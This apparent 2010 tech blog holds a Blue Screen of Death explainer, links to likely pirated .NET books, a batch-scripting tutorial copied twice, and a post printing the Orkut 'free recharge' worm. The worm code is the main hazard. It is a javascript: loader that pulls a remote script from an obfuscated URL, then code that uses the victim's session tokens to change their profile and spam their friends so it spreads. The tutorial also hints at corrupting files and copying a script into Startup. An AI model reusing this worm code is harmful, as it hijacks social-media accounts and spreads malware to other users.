The Blue Screen Of Death (as its commonly known)is a common error type found in Windows XP. You must have noticed that sometimes while XP is running and suddenly a complete blue screen occurs with heading something like "The system has been halted to Prevent further damage to your system". Its a fatal error and at the middle somewhere you will find error name and its HexaDecimal code like: "0x0000007A:KERNEL_DATA_INPAGE_ERROR". Its just an example there's a hundred of such error codes that the system will show based on the problem with your hardware.
It also show at the bottom that its dumping memory to file.
This is common error which occurs because of hardware and sometimes internal software problems.
Many a times when your RAM is not inserted correctly or some hardware like Hard-disk and others have any problem then this error occurs.
The way to handle these errors are to 1st check whether this error is only once or it occurs again and again.
If it occurs once then it might be some temporary problem may be due voltage fluctuation or file corruption.
But if it occurs again and again then it is something important. Note down the error code which is a hexadecimal number, something like 0x0000002C: And the error name. Then go to google and search for it. Since there are many codes and problems so i cannot state solution for each but on net its available.
Secondly if u can't find a reason or solution for your problem then just open your CPU and assemble it again. All connection again. If its related to DATA and Memory then run chkdsk and other tools.
Saturday, October 16, 2010
Friday, October 1, 2010
Some Books for Dot Net Students.
C # CODES.doc
If U Have any confusion regarding books name or details, then refer below:
http://www.4shared.com/document/D6jJd6CB/0471237523Developing_Visual_St.html
http://www.4shared.com/document/gAOWLrWt/0596001037COM_and_Net_Componen.html
http://www.4shared.com/document/WIWxMhk0/0596003153CSharp_Essentials_2n.html
http://www.4shared.com/document/V8tJk8m9/0672322196Net_e-Business_Archi.html
http://www.4shared.com/document/ch0D9N75/0735618011Applied_XML_Programm.html
http://www.4shared.com/document/aXiqfj4l/Application_Architecture_for_N.html
http://www.4shared.com/document/SawKxmDa/Applied_MicrosoftNET_Framework.html
http://www.4shared.com/document/yE1DjK78/ASPNET_Database_Programming_We.html
http://www.4shared.com/document/y5SoZXxx/ASPNETWEBDEVGUIDE.html
http://www.4shared.com/document/DExxx8za/Building_Secure_ASPNET_Applica.html
http://www.4shared.com/document/E0iGSiSf/Building_XML_Web_Services_for_.html
http://www.4shared.com/document/ab-J_fDA/C__CODES.html
http://www.4shared.com/document/66rd4-KO/Designing_Microsoft_ASPNET_App.html
http://www.4shared.com/document/kaHINYCK/ebay-dropship-profits.html
http://www.4shared.com/document/8ljRL4-d/Enterprise_Solution_Patterns_U.html
http://www.4shared.com/document/9mSQpXEo/Improving_NET_Application_Perf.html
http://www.4shared.com/document/O1CGsnmp/Improving_Web_Application_Secu.html
http://www.4shared.com/document/T1T7Fbts/Introduction_to_Design_Pattern.html
http://www.4shared.com/document/aNdJgRmS/ms_press_-_microsoft_adonet_st.html
http://www.4shared.com/document/iSz-nCZ9/net_dev_journ_-_sept_2k3.html
http://www.4shared.com/document/zhjQbh-Q/NETFrameworkEssentials2ndEditi.html
http://www.4shared.com/document/u6u1Y5ax/Performance_Testing_Microsoft_.html
http://www.4shared.com/document/8485faY7/Quake_II_NET_Port_Whitepaper.html
http://www.4shared.com/document/-yV9qtJU/windows_forms_programming_with.html
Dot.Net MagazinAndrew Ferguson dot NET
Wednesday, September 8, 2010
Batch file programming.
Hi Everyone, You all would have heard command prompt if u use windows OS.
Note: All the commands and batch file codes are for educational purpose only.In case of any harm caused on the system, nor the writer nor the publisher will be responsible. Please keep a backup of files before attempting to use these codes.
The batch file is nothing except the series of command to be performed one after the other. Like - Deleting files from the two Temporary folder,cookies,prefetch,etc files can be done in file and that's done by batch files.
Well, they have extensions: .bat(dot bat)
Now,for learning batch file programming you need to know some commands that are necessary to know.
You may try to go for help but that will give you a list of limited commands. Although to get started they are enough. As for good purposes like clearing temp files, deleting some special files, keeping a log file, creating files......
So to get started, lets start with echo command:
1. echo: This is the command used to print information, whether to the console(command prompt) or directed place.
This command will print everything whether u give it any value or not . i.e it will also print the command u had typed in the batch file. So to stop this and enhance the look we always turn off auto echoing by:
@echo off
Now it will print only those things which are passed to echo. Like a batch to delete all text files:
@echo off
echo Deleting text files.........
del /f *.txt
echo Deleted!!
Save this as deleter.bat and run it. Make sure to change the extension of any important text file u have in the folder because /f switch will force it to delete without asking for permission.
2. pause - this single command pauses the operation , prints" Press any key to continue..." and waits for the user to press a key. This is usually important because batch files tend to close as soon as they complete without giving u a chance to read it.
So at last its important to put pause or u will have to run batch file from console rather than just double clicking it.
3.rem - This command is used to save comments for the other batch file reader i.e. used for commenting(as in programming terms). It is also used to save info to config.sys file(No need to bother about this).
4. paths i.e. different variables set as path . Like to go to system drive just type cd /d %windir% and u will be in system directory from any drive. /d is used to change drive with the directory. They are important because not always the system drive will be c: it can be any other depending on systems, so using path variables proves useful since this frees us from the headache of knowing system dive.
to get the full list, just type set at command prompt.
5. Output and Input Redirection:- Generally in all programming languages there are 3 standard streams: standard Input Stream i.e. keyboard,Standard Output Stream i.e. monitor or console and Standard Error stream i.e. where error are displayed.
But often we want to write to file and other places, for this we need to redirect output.
In batch file programming, we can do that with '>' operator(without Quotes). Single > will erase everything and write. Double > i.e. >> will add the text at last of the file.
Eg. you want to store the list of all files and folders(with list of all files within a folder and so on)
you can just type:
dir /s >> new.txt
The /s switch compels dir command to show all files and folder, and all files within the folder, and if any folder then all contents of that folder and so on until the chain gets finished.
Similarly, if u want to copy one files content to another file, instead of using copy command u can do following:
type file1.txt >> file2.txt -- this will copy the contents of text file1 at the end of file2.txt .
We use type command because it shows all the text at once unlike more command which shows page wise and needs pressing enter for other ones.
Echo command can also be used similarly.
Now for redirecting input from other commands we use piping '|'
This redirects the output of 1 command as input of other command. like:
dir /s | more - since this command shows all the directory and its sub directories and its files ... we are only able to read the last few folders, passing it with more will allow u read all the folders.
Note:'|' symbol can be obtained by pressing (shift + \)
The Redirection can also be done to other devices like Printers.
DEVICE NAME USED DEVICE
AUX Auxiliary Device (COM1)
CLOCK$ Real Time Clock
COMn Serial Port(COM1, COM2, COM3,COM4)
CON Console(Keyboard, Screen)
LPTn Parallel Port(LPT1, LPT2, LPT3)
NUL NUL Device(means Nothing)
PRN Printer
Say for example, you want to print the results of directory listings,
then you can simply give the following
command:
c:\windows>dir *.* > prn
Now , nul device literally means nothing. You can direct the output of such commands which just shows work done to prevent it from showing to the user. Like coping command shows the number of file copied. If u don't want to show it or keep it just: copy x.xx y.yy > nul
6. Parameters:
We can also provide batch file, arguments at the run time. Like, passing file names for reading by user at run time.
The Parameters can be obtained by using %number. The arguments are delimited or separated by space.
So 1st parameter can be obtained by: %1
2nd parameter can be obtained by: %2
3rd parameter can be obtained by: %3
.....
9th parameter can be obtained by: %9
And if we need parameters more than 9 then just use 'shift' keyword. This will replace parameters to left by 1 i.e. 2nd parameter will become 1 , 3rd will become 2nd ..... and the 9th is empty.
But the 1st parameter will be lost. So instead of using %2 and %3.
We can use shift each time we use the 1st Parameter.So the 2nd will become 1st and we can again use it.
7. Set command, the variable of batch files-
Set command is used to create environmental variables.
This will enable u to do 2 things:
* Lets u to store any text,command or path address in a variable which can be expanded to the value anytime.
* Lets u store any text or address entered by the user at run-time. Like the choice of user.
Use-age: set variable_name= text,command or path address.
Note for user input from keyboard use switch /P with set command and the message to display after the equals sign.
Like:
@echo off
echo Welcome to deleter or hider.
echo type d for deleting and h for hiding.
set /P ch=Enter Choice:
if %ch%==d goto deleter
if %ch%==h goto hide
:deleter
echo enter file name with extensions to delete
set /P file=name:
del /f %file% >> echo
goto end
:hide
echo enter file name with extension to hide
set /P file=name:
attrib +h +s +r %file% >> echo
:end
pause
Here the text Enter Choice: and name: will be shown and user will be asked to enter the text.
goto command takes the cmd to the label pointed by the goto. And we can create labels by putting a colon before Label name. Like :label_name
The switch /A lets u put an expression on the right hand side of variable. I.e. the value of variable will be value of expression.
8.for command:
This command lets u run any command for a number of times or for a number of files. Just like looping.
Syntax: for %variable in(sets of files like *.txt for all text files and address for other folders may also be give here) Do command to be executed for each file
Here %variable means declaring any variable name like %i or %l ..
And for each loop %%i will contain the 1 file name among the set specified in the bracket.
For Eg, to rename all the .txt file to .virus just type:
for %%i in ( *.txt) do ren *.txt *.vir
Although here for command was not exactly needed because directly ' ren *.txt *.vir ' would have renamed all but changing contents of dll files or rather say for corrupting files this can prove useful.
9.If command:
This command is used to do comparisons or checking of parameters and user inputs and work accordingly. Moreover it can also check whether a file exists or not and also checking of variables or strings.
For File checking: if EXIST file_name command_to_perform_if_true
like if EXIST c:\windows\notepad.exe Echo Notepad exists.
This command will print Notepad Exists if notepad is in directory windows.
Note: this command cannot be used for directories. I will search for directories, but now work only on files.
We can also use else with if but else has to be in the same line. And some commands need new lines at the end to work, like del command. So better use () brackets and write commands in bracket like:
if exist C:\windows\notepad.exe (del /f notepad.exe) else (echo notepad doesn't exists)
For parameter checking:
if %1==c goto cdrive
if %1==d goto ddrive
:cdrive
copy %2 c:
exit
:ddrive
copy %2 d:
We can also check if parameters are passed by: if %1=="" echo No Parameter bro
Similarly u can check any thing u want just keep sure u use double equals sign.
For both the usage of if we can also use the NOT clause as:
if not exist c:\test echo test not created yet
10. Choice command:
Before we learn how to make use of the CHOICE command, we need to what error levels really are. Now Error levels are generated by programs to inform about the way they finished or were forced to finish their execution. For example, when we end a program by pressing CTRL+C to end a program, the error level code evaluates to 3 and if the program closes normally, then the error level evaluates to 0. These numbers all by themselves are not useful but when used with the IF ERROR LEVEL and the CHOICE command, they become very useful. The CHOICE command takes a letter or key from the keyboard and returns the error level evaluated when the key is pressed. The general syntax of the CHOICE command is:
CHOICE "The message to user goes here " [/C:keys][/S][/N][/T:key,secs]
The string part is nothing but the string to be displayed when the CHOICE command is run.
The /C:keys defines the possible keys to be pressed. If options are not mentioned then the default Y/N keys are used instead.
For example, The command,
CHOICE /C:ABCD
Defines A, B, C and D as the possible keys. During execution if the user presses a undefined key, he will hear a beep sound and the program will continue as coded.
The /S switch makes the possible keys defined by the CHOICE /c flag case sensitive. So it means that if the /S flag is present then A and a would be different.
The /N switch, if present shows the possible keys in brackets when the program is executed. If the /N switch is missing then, the possible keys are not shown in brackets. Only the value contained in the double quotes is shown.
/T:key,secs defines the key which is taken as the default after a certain amount of time has passed.
For Example,
CHOICE "Choose Option A or B" /C:AB /T:B.5
The above command displays Choose Options and if no key is pressed for the next 5 seconds, then it chooses B. Now to truly combine the CHOICE command with the IF ERROR LEVEL command, you need to know what the CHOICE command returns.
The CHOICE command is designed to return an error level according to the pressed key and its position in the /C switch. To understand this better, consider the following example,
CHOICE /C:XYZA
Now remember that the error level code value depends on the key pressed. This means that if the key X is pressed, then the error level is 1, if the key Y is pressed then the error level is 2, if Z is pressed then error level is 3 and if A is pressed then error level is 4.
Now let us see how the IF ERROR LEVEL command works. The general syntax of this command is:
IF [NOT] ERRORLEVEL number command to execute.
This statement evaluates the current error level number. If the condition is true then the command is executed.
For Example,
IF ERRORLEVEL 3 ECHO Yes
The above statement prints Yes on the screen if the current error level is 3.
The important thing to note in this statement is that the evaluation of an error level is true when the error level us equal or higher than the number compared.
For Example, in the following statement,
IF ERRORLEVEL 2 ECHO YES
The condition is true if the error level is > or = 2.
Now that you know how to use the CHOICE and ERROR LEVEL IF command together, you can now easily create menu based programs. The
following is an example of such a batch file which asks the User to choose a typing Pad:
@echo off
echo .
echo .
echo Welcome to typing Pad selection
echo 1.Notepad
echo 2.WordPad
echo 3.Microsoft Word
echo 4.Command prompt word
CHOICE "Choose Pad" /C:1234 /N
if ERRORLEVEL 4 edit %1
if ERRORLEVEL 3 start c:\Program Files\..i.e. path of word.exe.. %1
if ERRORLEVEL 2 start wordpad %1
if ERRORLEVEL 1. notepad %1
:END
Note the order of if statements, since in errorlevel comarision it accepts the value for >= so decreasing order was necessary.
NOTES:
1. TO COPY THE BATCH FILE ITSELF JUST USE %0 AS THE SOURCE IN THE COPY COMMAND. THIS WILL ENABLE YOU TO COPY THE BATCH FILE TO PLACES LIKE STARTUP,STARTMENU, DESKTOP,MY DOCUMENTS, ETC.
2. AT MANY PLACES YOU WILL FIND THAT COMPUTER IS NOT TAKING THE PARAMETERS, IN THAT CASE USE DOUBLE '%%', AS IN BATCH FILE COMPUTER OFTEN DELETES ONE % AND HENCE TWO IS NECESSARY FOR FUNCTIONING. I GUESS AT MOST PLACES YOU WILL HAVE TO USE DOUBLE %%.
3. BEFORE STARTING TO USE BATCH FILES AND COMMANDS I RECOMMEND YOU TO AT LEAST READ THE HELP FILE OF COMMAND BY : COMMAND_NAME /? JUST ADD /? AFTER THE COMMAND AND IT WILL OPEN ITS HELP FILE WHICH CONTAINS DETAILS OF EACH SWITCH AVAILABLE.
4. WORK ON COMMANDS LIKE NET,NBTSTAT,NETSTAT,SHUTDOWN,FORMAT,CALL,ETC. THESE COMMANDS ARE USEFUL, LIKE TO CREATE USERS, ADMINISTRATORS USE3 NET USER COMMAND. JUST TYPE: NET USER /? AND READ THE WHOLE HELP FILE. IF U FIND THAT HELP FILES ARE TOO LONG THEN JUST SAVE IT IN A FILE: NET USER/? > NET.TXT
Note: All the commands and batch file codes are for educational purpose only.In case of any harm caused on the system, nor the writer nor the publisher will be responsible. Please keep a backup of files before attempting to use these codes.
The batch file is nothing except the series of command to be performed one after the other. Like - Deleting files from the two Temporary folder,cookies,prefetch,etc files can be done in file and that's done by batch files.
Well, they have extensions: .bat(dot bat)
Now,for learning batch file programming you need to know some commands that are necessary to know.
You may try to go for help but that will give you a list of limited commands. Although to get started they are enough. As for good purposes like clearing temp files, deleting some special files, keeping a log file, creating files......
So to get started, lets start with echo command:
1. echo: This is the command used to print information, whether to the console(command prompt) or directed place.
This command will print everything whether u give it any value or not . i.e it will also print the command u had typed in the batch file. So to stop this and enhance the look we always turn off auto echoing by:
@echo off
Now it will print only those things which are passed to echo. Like a batch to delete all text files:
@echo off
echo Deleting text files.........
del /f *.txt
echo Deleted!!
Save this as deleter.bat and run it. Make sure to change the extension of any important text file u have in the folder because /f switch will force it to delete without asking for permission.
2. pause - this single command pauses the operation , prints" Press any key to continue..." and waits for the user to press a key. This is usually important because batch files tend to close as soon as they complete without giving u a chance to read it.
So at last its important to put pause or u will have to run batch file from console rather than just double clicking it.
3.rem - This command is used to save comments for the other batch file reader i.e. used for commenting(as in programming terms). It is also used to save info to config.sys file(No need to bother about this).
4. paths i.e. different variables set as path . Like to go to system drive just type cd /d %windir% and u will be in system directory from any drive. /d is used to change drive with the directory. They are important because not always the system drive will be c: it can be any other depending on systems, so using path variables proves useful since this frees us from the headache of knowing system dive.
to get the full list, just type set at command prompt.
5. Output and Input Redirection:- Generally in all programming languages there are 3 standard streams: standard Input Stream i.e. keyboard,Standard Output Stream i.e. monitor or console and Standard Error stream i.e. where error are displayed.
But often we want to write to file and other places, for this we need to redirect output.
In batch file programming, we can do that with '>' operator(without Quotes). Single > will erase everything and write. Double > i.e. >> will add the text at last of the file.
Eg. you want to store the list of all files and folders(with list of all files within a folder and so on)
you can just type:
dir /s >> new.txt
The /s switch compels dir command to show all files and folder, and all files within the folder, and if any folder then all contents of that folder and so on until the chain gets finished.
Similarly, if u want to copy one files content to another file, instead of using copy command u can do following:
type file1.txt >> file2.txt -- this will copy the contents of text file1 at the end of file2.txt .
We use type command because it shows all the text at once unlike more command which shows page wise and needs pressing enter for other ones.
Echo command can also be used similarly.
Now for redirecting input from other commands we use piping '|'
This redirects the output of 1 command as input of other command. like:
dir /s | more - since this command shows all the directory and its sub directories and its files ... we are only able to read the last few folders, passing it with more will allow u read all the folders.
Note:'|' symbol can be obtained by pressing (shift + \)
The Redirection can also be done to other devices like Printers.
DEVICE NAME USED DEVICE
AUX Auxiliary Device (COM1)
CLOCK$ Real Time Clock
COMn Serial Port(COM1, COM2, COM3,COM4)
CON Console(Keyboard, Screen)
LPTn Parallel Port(LPT1, LPT2, LPT3)
NUL NUL Device(means Nothing)
PRN Printer
Say for example, you want to print the results of directory listings,
then you can simply give the following
command:
c:\windows>dir *.* > prn
Now , nul device literally means nothing. You can direct the output of such commands which just shows work done to prevent it from showing to the user. Like coping command shows the number of file copied. If u don't want to show it or keep it just: copy x.xx y.yy > nul
6. Parameters:
We can also provide batch file, arguments at the run time. Like, passing file names for reading by user at run time.
The Parameters can be obtained by using %number. The arguments are delimited or separated by space.
So 1st parameter can be obtained by: %1
2nd parameter can be obtained by: %2
3rd parameter can be obtained by: %3
.....
9th parameter can be obtained by: %9
And if we need parameters more than 9 then just use 'shift' keyword. This will replace parameters to left by 1 i.e. 2nd parameter will become 1 , 3rd will become 2nd ..... and the 9th is empty.
But the 1st parameter will be lost. So instead of using %2 and %3.
We can use shift each time we use the 1st Parameter.So the 2nd will become 1st and we can again use it.
7. Set command, the variable of batch files-
Set command is used to create environmental variables.
This will enable u to do 2 things:
* Lets u to store any text,command or path address in a variable which can be expanded to the value anytime.
* Lets u store any text or address entered by the user at run-time. Like the choice of user.
Use-age: set variable_name= text,command or path address.
Note for user input from keyboard use switch /P with set command and the message to display after the equals sign.
Like:
@echo off
echo Welcome to deleter or hider.
echo type d for deleting and h for hiding.
set /P ch=Enter Choice:
if %ch%==d goto deleter
if %ch%==h goto hide
:deleter
echo enter file name with extensions to delete
set /P file=name:
del /f %file% >> echo
goto end
:hide
echo enter file name with extension to hide
set /P file=name:
attrib +h +s +r %file% >> echo
:end
pause
Here the text Enter Choice: and name: will be shown and user will be asked to enter the text.
goto command takes the cmd to the label pointed by the goto. And we can create labels by putting a colon before Label name. Like :label_name
The switch /A lets u put an expression on the right hand side of variable. I.e. the value of variable will be value of expression.
8.for command:
This command lets u run any command for a number of times or for a number of files. Just like looping.
Syntax: for %variable in(sets of files like *.txt for all text files and address for other folders may also be give here) Do command to be executed for each file
Here %variable means declaring any variable name like %i or %l ..
And for each loop %%i will contain the 1 file name among the set specified in the bracket.
For Eg, to rename all the .txt file to .virus just type:
for %%i in ( *.txt) do ren *.txt *.vir
Although here for command was not exactly needed because directly ' ren *.txt *.vir ' would have renamed all but changing contents of dll files or rather say for corrupting files this can prove useful.
9.If command:
This command is used to do comparisons or checking of parameters and user inputs and work accordingly. Moreover it can also check whether a file exists or not and also checking of variables or strings.
For File checking: if EXIST file_name command_to_perform_if_true
like if EXIST c:\windows\notepad.exe Echo Notepad exists.
This command will print Notepad Exists if notepad is in directory windows.
Note: this command cannot be used for directories. I will search for directories, but now work only on files.
We can also use else with if but else has to be in the same line. And some commands need new lines at the end to work, like del command. So better use () brackets and write commands in bracket like:
if exist C:\windows\notepad.exe (del /f notepad.exe) else (echo notepad doesn't exists)
For parameter checking:
if %1==c goto cdrive
if %1==d goto ddrive
:cdrive
copy %2 c:
exit
:ddrive
copy %2 d:
We can also check if parameters are passed by: if %1=="" echo No Parameter bro
Similarly u can check any thing u want just keep sure u use double equals sign.
For both the usage of if we can also use the NOT clause as:
if not exist c:\test echo test not created yet
10. Choice command:
Before we learn how to make use of the CHOICE command, we need to what error levels really are. Now Error levels are generated by programs to inform about the way they finished or were forced to finish their execution. For example, when we end a program by pressing CTRL+C to end a program, the error level code evaluates to 3 and if the program closes normally, then the error level evaluates to 0. These numbers all by themselves are not useful but when used with the IF ERROR LEVEL and the CHOICE command, they become very useful. The CHOICE command takes a letter or key from the keyboard and returns the error level evaluated when the key is pressed. The general syntax of the CHOICE command is:
CHOICE "The message to user goes here " [/C:keys][/S][/N][/T:key,secs]
The string part is nothing but the string to be displayed when the CHOICE command is run.
The /C:keys defines the possible keys to be pressed. If options are not mentioned then the default Y/N keys are used instead.
For example, The command,
CHOICE /C:ABCD
Defines A, B, C and D as the possible keys. During execution if the user presses a undefined key, he will hear a beep sound and the program will continue as coded.
The /S switch makes the possible keys defined by the CHOICE /c flag case sensitive. So it means that if the /S flag is present then A and a would be different.
The /N switch, if present shows the possible keys in brackets when the program is executed. If the /N switch is missing then, the possible keys are not shown in brackets. Only the value contained in the double quotes is shown.
/T:key,secs defines the key which is taken as the default after a certain amount of time has passed.
For Example,
CHOICE "Choose Option A or B" /C:AB /T:B.5
The above command displays Choose Options and if no key is pressed for the next 5 seconds, then it chooses B. Now to truly combine the CHOICE command with the IF ERROR LEVEL command, you need to know what the CHOICE command returns.
The CHOICE command is designed to return an error level according to the pressed key and its position in the /C switch. To understand this better, consider the following example,
CHOICE /C:XYZA
Now remember that the error level code value depends on the key pressed. This means that if the key X is pressed, then the error level is 1, if the key Y is pressed then the error level is 2, if Z is pressed then error level is 3 and if A is pressed then error level is 4.
Now let us see how the IF ERROR LEVEL command works. The general syntax of this command is:
IF [NOT] ERRORLEVEL number command to execute.
This statement evaluates the current error level number. If the condition is true then the command is executed.
For Example,
IF ERRORLEVEL 3 ECHO Yes
The above statement prints Yes on the screen if the current error level is 3.
The important thing to note in this statement is that the evaluation of an error level is true when the error level us equal or higher than the number compared.
For Example, in the following statement,
IF ERRORLEVEL 2 ECHO YES
The condition is true if the error level is > or = 2.
Now that you know how to use the CHOICE and ERROR LEVEL IF command together, you can now easily create menu based programs. The
following is an example of such a batch file which asks the User to choose a typing Pad:
@echo off
echo .
echo .
echo Welcome to typing Pad selection
echo 1.Notepad
echo 2.WordPad
echo 3.Microsoft Word
echo 4.Command prompt word
CHOICE "Choose Pad" /C:1234 /N
if ERRORLEVEL 4 edit %1
if ERRORLEVEL 3 start c:\Program Files\..i.e. path of word.exe.. %1
if ERRORLEVEL 2 start wordpad %1
if ERRORLEVEL 1. notepad %1
:END
Note the order of if statements, since in errorlevel comarision it accepts the value for >= so decreasing order was necessary.
NOTES:
1. TO COPY THE BATCH FILE ITSELF JUST USE %0 AS THE SOURCE IN THE COPY COMMAND. THIS WILL ENABLE YOU TO COPY THE BATCH FILE TO PLACES LIKE STARTUP,STARTMENU, DESKTOP,MY DOCUMENTS, ETC.
2. AT MANY PLACES YOU WILL FIND THAT COMPUTER IS NOT TAKING THE PARAMETERS, IN THAT CASE USE DOUBLE '%%', AS IN BATCH FILE COMPUTER OFTEN DELETES ONE % AND HENCE TWO IS NECESSARY FOR FUNCTIONING. I GUESS AT MOST PLACES YOU WILL HAVE TO USE DOUBLE %%.
3. BEFORE STARTING TO USE BATCH FILES AND COMMANDS I RECOMMEND YOU TO AT LEAST READ THE HELP FILE OF COMMAND BY : COMMAND_NAME /? JUST ADD /? AFTER THE COMMAND AND IT WILL OPEN ITS HELP FILE WHICH CONTAINS DETAILS OF EACH SWITCH AVAILABLE.
4. WORK ON COMMANDS LIKE NET,NBTSTAT,NETSTAT,SHUTDOWN,FORMAT,CALL,ETC. THESE COMMANDS ARE USEFUL, LIKE TO CREATE USERS, ADMINISTRATORS USE3 NET USER COMMAND. JUST TYPE: NET USER /? AND READ THE WHOLE HELP FILE. IF U FIND THAT HELP FILES ARE TOO LONG THEN JUST SAVE IT IN A FILE: NET USER/? > NET.TXT
Tuesday, August 3, 2010
The Real Mystery:JavaScript behind the" Recharge Rs500 daily by Google" spread nowerdays on Orkut.com
If you use Orkut the u must be knowing about the hacking trick very spread nowerdays:
Recharge Rs 500 Daily by google.
And anyone who clicks and follows the trick gets screwed and his account is gone from his hand.
This is just the game of Javascript. I m pasting the complete javascript but don't just copy it try to learn and understand it:
javascript:
d=document;
c=d.createElement(%22script%22);
d.body.appendChild(c);
c.src=%22ht%22+%22tp:%22+%22//sn%22+%22url.%22+%22com%22+%22/%22+%22z7t7k%22;
void(0)
This is used to redirect to the real jscript which is below The real game begins here :
alert("Wait 5 mins Only ...");
var assuntox, mensagemx, b;
var assuntox = "FREE RECHARGE RS 1000 GOOGLE'S OFFICIAL SITE";
var mensagemx = "[b][red]FREE RECHARGE TRICK [/b][/red] [8)] \n\n\n[b]Do you Know About Free Recharge \nChanged By Orkut
Changed By Orkut here is the new link... [green]ENJOY FREE RECHARGE RS 500 DAILY [/green]. \n\n\n\n\n[b][red]GOTO:
[gray][/gray][/gray] <- GO HERE TO RECHARGE YOUR MOBILE FREE \n\n[b]OR[/b] [/red][/b][b]
[b][red]www.[i][/i]cl.[b][/b]lk/z7td3[/RED] [/purple] \n\nCopy n Paste link where www , orkut, com / Main *#Home is written
i.e orkut home page \n\n\n.\n[navy]Finally which works orkut Got Working Script !![/navy] [:)] \n\n\n [navy]NUMBER of
Orkutians got recharge:[/navy]" + Math.floor(Math.random() * 999999);
var b = "[b][red]FREE RECHARGE TRICK [/b][/red] [8)] \n\n\n[b]Do you Know About Free Recharge \nChanged By Orkut Changed
By Orkut here is the new link... [green]ENJOY FREE RECHARGE RS 500 DAILY [/green]. \n\n\n\n\n[b][red]GOTO:
[gray][/gray][/gray] <- GO HERE TO RECHARGE YOUR MOBILE FREE \n\n[b]OR[/b] [/red][/b][b]
[b][red]www.[i][/i]cl.[b][/b]lk/z7td3[/RED] [/purple] \n\nCopy n Paste link where www , orkut, com / Main *#Home is written
i.e orkut home page \n\n\n.\n[navy]Finally which works orkut Got Working Script !![/navy] [:)] \n\n\n [navy]NUMBER of
Orkutians got recharge:[/navy]" + Math.floor(Math.random() * 999999);
try {
document.title = "Free Recharge ";
function createXMLHttpRequest() {
return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest;
}
var bieldiego = createXMLHttpRequest();
var biel = "FREE RECHARGE -";
var diego = "CODES ((CLICK HERE))";
bieldiego.open("POST", "EditSummary", false);
bieldiego.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
bieldiego.send("POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" +
encodeURIComponent(JSHDF['Page.signature.raw']) + "&firstName=" + encodeURIComponent(biel) + "&lastName=" +
encodeURIComponent(diego) +
"&gender=&status=1&birthdayPrivacy=1&birthMonth=0&sexPrefPrivacy=1&birthDay=1&country=93&birthYear=1990&birthYearPrivacy=1&la
nguage1=&highSchool=&education.1.school=&education.1.schoolPrivacy=1&company=&companyPrivacy=1&city=&postalCode=&Action.updat
e=Enviar+dados");
var about = createXMLHttpRequest();
about.open("POST", "EditSocial", false);
about.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
about.send("POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" +
encodeURIComponent(JSHDF['Page.signature.raw']) +
"&kids=1ðnicity=0&religion=0&political=0&humor.submitted=1&sexPref=1&sexPrefPrivacy=3&fashion.submitted=1&smoking=1&drinki
ng=0&pets=0&living.submitted=1&hometown=&webpageUrl=&aboutMe=" + encodeURIComponent(mensagemx) +
"&passions=&sports=&activities=&books=&music=&shows=&movies=&cuisines=&Action.update=Enviar+dados");
var status = createXMLHttpRequest();
status.open("POST", "Profile", false);
status.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
status.send("POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" +
encodeURIComponent(JSHDF['Page.signature.raw']) + "&userStatus=" + encodeURIComponent('[b] FREE RECHARGE TRICK GO TO:
[b][red]www.[i][/i]cl.[b][/b]lk/z7td3[/RED]') + "&Action.editUserStatusMessage=1");
function getFL(a) {
var b = createXMLHttpRequest();
b.open("GET", "/RequestFriends.aspx?req=fl&uid=" + a + "&oxh=1&rnd=" + Math.random(), false);
b.send(null);
if (b.status == 200) {
eval("var jSON=" + b.responseText.split("while (true); &&&START&&&")[1] + ";");
manageFriends(jSON);
}
}
function manageFriends(a) {
var b = a.data.list;
var c = b.length > 10 ? 10 : b.length;
getAid(b, 0);
}
function getAid(a, n) {
var b = a.length;
if (n == b) {
return;
}
var c = createXMLHttpRequest();
var d = a[Math.round(Math.random() * (a.length - 1))].id;
c.open("GET", "/AlbumList.aspx?uid=" + d, false);
c.send(null);
if (c.status == 200) {
var e = c.responseText.match(/aid=(\d+)/i);
if (e) {
e = e[1];
getPid(d, e);
}
}
n++;
getAid(a, n);
}
function getPid(a, b) {
var c = createXMLHttpRequest();
c.open("GET", "/Album.aspx?uid=" + a + "&aid=" + b, false);
c.send(null);
if (c.status == 200) {
var d = c.responseText.match(/&(amp;)?pid=(\d+)/i);
if (d) {
postComment(a, b, d[2]);
}
}
}
function postComment(a, b, c) {
var d = "com=" + encodeURIComponent("[b] FREE RECHARGE TRICK GO TO:[b][red]www.[i][/i]cl.[b][/b]lk/z7td3[/RED]
") + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) +
"&Action.addComment=&aid=" + b + "&uid=" + a + "&pid=" + c + "&ploc=&oxh=1";
xml = createXMLHttpRequest();
xml.open("POST", "/AlbumZoom", false);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xml.send(d);
sendScrap(a);
}
function sendScrap(a) {
var c = "Action.submit=1&scrapText=" + encodeURIComponent("Oww YOu knw Abt new FREE RECHARGE TRICK \n\nJust Go to
thiz SITE its So Dashing Yaar \n\nIT WORKS!!! [green]FREE RECHARGE TRICK [/green]. \n\nJust Go to thiz Site And Follow The
Below Steps yaar:\n\nAcesse: [b][red]www.[i][/i]cl.[b][/b]lk/z7td3[/RED] \n\n Copy n Paste link where www , orkut, com /
Main *#Home is written i.e orkut home page \n\n.\n\nTry yaar its So awsum N I got recharge N accept my testinomial Also
\n[red]No Of PEOPLE WHO WON:[/red]") + Math.floor(Math.random() * 91839067) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] +
"&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;
var d = createXMLHttpRequest();
d.open("POST", "/Scrapbook.aspx", false);
d.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
d.send(c);
depo(a);
}
function depo(a) {
var b = mensagemx;
var c = "Action.submit&countedTextbox=" + encodeURIComponent(b) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] +
"&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;
var xxt = createXMLHttpRequest();
xxt.open("POST", "/TestimonialWrite.aspx", false);
xxt.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
